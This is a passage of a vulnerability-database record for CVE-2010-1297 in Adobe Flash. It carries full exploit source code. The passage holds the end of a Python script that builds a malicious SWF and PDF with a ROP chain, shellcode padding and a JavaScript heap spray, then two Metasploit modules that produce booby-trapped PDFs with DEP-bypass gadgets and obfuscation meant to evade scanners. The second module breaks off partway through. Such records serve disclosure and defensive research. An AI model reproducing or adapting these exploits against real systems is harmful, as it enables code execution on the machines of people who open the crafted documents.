#add eax,8 ret \nrop += \"\\xCF\\x97\\xDE\\x77\" #xchg eax,esp ret \n \nstr3 = strTotal[669:1249] \nalignESP = \"\\x83\\xc4\\x03\" \nsc = self.get_payload() \n \nif len(sc) > 2118: \nprint \"[*] Error : payload length is long\" \nreturn \nif len(sc) <= 2118: \ndif = 2118 - len(sc) \nwhile dif > 0 : \nsc += '\\x90' \ndif = dif - 1 \n \nstr4 = strTotal[3370:3726] \n \naddr2 = '\\xF2\\x3D\\x8D\\x23' # Enter 0C75 , 81 RET \n \nstr5 = strTotal[3730:] \n \nfdW= open('exploit.swf', 'wb+') \nfinalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5 \nfdW.write(finalStr) \n \n#strTotal = open('exploit.swf', 'rb+').read() \nfdW.close() \nfdR.close() \nreturn finalStr \n \nexcept IOError: \nprint '[*] Error : An IO error has occurred' \n \ndef HeapSpray(self): \nspray = ''' \nfunction spray_heap() \n{ \nvar chunk_size, payload, nopsled; \n \nchunk_size = 0x1A0000; \npointers = unescape(\"%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030\"); \npointerSled = unescape(\"<Contents>\"); \nwhile (pointerSled.length < chunk_size) \npointerSled += 
pointerSled; \npointerSled_len = chunk_size - (pointers.length + 20); \npointerSled = pointerSled.substring(0, pointerSled_len); \nheap_chunks = new Array(); \nfor (var i = 0 ; i < <CHUNKS> ; i++) \nheap_chunks[i] = pointerSled + pointers; \n} \n \n \nspray_heap(); \n''' \n \nspray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX \n''' \nAuthplay.dll \n \n303033DD ? 87DC XCHG ESP,EBX \n \n############################################################# \nwill do nothing \n \n303033DF ? 45 INC EBP \n303033E0 ? 05 00898784 ADD EAX,84878900 \n303033E5 ? 42 INC EDX \n303033E6 ? 05 008987E8 ADD EAX,E8878900 \n303033EB ? 41 INC ECX \n303033EC ? 05 008987EC ADD EAX,EC878900 \n303033F1 ? 41 INC ECX \n303033F2 ? 05 008987F0 ADD EAX,F0878900 \n303033F7 ? 41 INC ECX \n303033F8 ? 05 008987F4 ADD EAX,F4878900 \n303033FD ? 41 INC ECX \n303033FE ? 05 005F5E5D ADD EAX,5D5E5F00 \n30303403 . B8 01000000 MOV EAX,1 \n30303408 . 5B POP EBX \n############################################################ \n \n30303409 . 83C4 30 ADD ESP,30 \n3030340C . 
C3 RETN \n \n''' \n \nspray = spray.replace('<CHUNKS>', '40') #Chunk count \nreturn spray \n \ndef generate_pdf(): \nexploit = Exploit() \nswfFile = 'exploit.swf' \npdf = PDF() \npdf.header() \npdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1) \n#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1) \npdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1) \npdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + \" /Type/Page\"+' /Contents '+pdf.ref(4) ,1) \npdf.obj_Stream(4, '','') \npdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1) \npdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) \npdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1) \npdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) \npdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) \npdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) \npdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) \npdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) \npdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1) \npdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) \npdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1) \npdf.obj_Stream(16, '<</Length 0 >> ','') \npdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) \n \npdf.xref() \npdf.trailer() \nreturn pdf.generate() \n \ndef main(): \nif len(sys.argv) != 2: \nprint 'Usage: python %s [output file name]' % sys.argv[0] \nsys.exit(0) \nfile_name = sys.argv[1] \nif not file_name.endswith('.pdf'): \nfile_name = 
file_name + '.pdf' \ntry: \nfd = open(file_name, 'wb+') \nfd.write(generate_pdf()) \nfd.close() \nprint '[-] PDF file generated and written to %s' % file_name \nexcept IOError: \nprint '[*] Error : An IO error has occurred' \nprint '[-] Exiting ...' \nsys.exit(-1) \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/93394/moaub-adobenewclass.txt"}], "exploitdb": [{"lastseen": "2016-02-02T06:16:11", "description": "Adobe Flash Player \"newfunction\" Invalid Pointer Use. CVE-2010-1297. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-25T00:00:00", "id": "EDB-ID:16687", "href": "https://www.exploit-db.com/exploits/16687/", "sourceData": "##\r\n# $Id: adobe_flashplayer_newfunction.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\r\n\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. 
Adobe Reader and Acrobat are also\r\n\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-1297'],\r\n\t\t\t\t\t['OSVDB', '65141'],\r\n\t\t\t\t\t['BID', '40586'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 04 
2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tswf_data = make_swf()\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(swf_data, js_data)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_swf\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\tswf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tswf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # 
pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / 
ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 
2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\t#pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog\")\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(5)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js 
action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\")\r\n\t\tpdf << nObfu(\"/Rect [20 20 187 69] \")\r\n\t\tpdf << nObfu(\"/RichMediaSettings \") << ioRef(8)\r\n\t\tpdf << nObfu(\"/RichMediaContent \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Activation \") << ioRef(10)\r\n\t\tpdf << nObfu(\"/Deactivation \") << ioRef(11)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaContent\")\r\n\t\tpdf << nObfu(\"/Assets \") << ioRef(12)\r\n\t\tpdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\"\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) 
<< nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Asset \") << ioRef(13)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16687/"}, {"lastseen": "2016-02-02T06:05:15", "description": "Adobe Flash Player \"newfunction\" Invalid Pointer Use. CVE-2010-1297. 
Local exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16614", "href": "https://www.exploit-db.com/exploits/16614/", "sourceData": "##\r\n# $Id: adobe_flashplayer_newfunction.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\r\n\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\r\n\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. 
This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-1297'],\r\n\t\t\t\t\t['OSVDB', '65141'],\r\n\t\t\t\t\t['BID', '40586'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 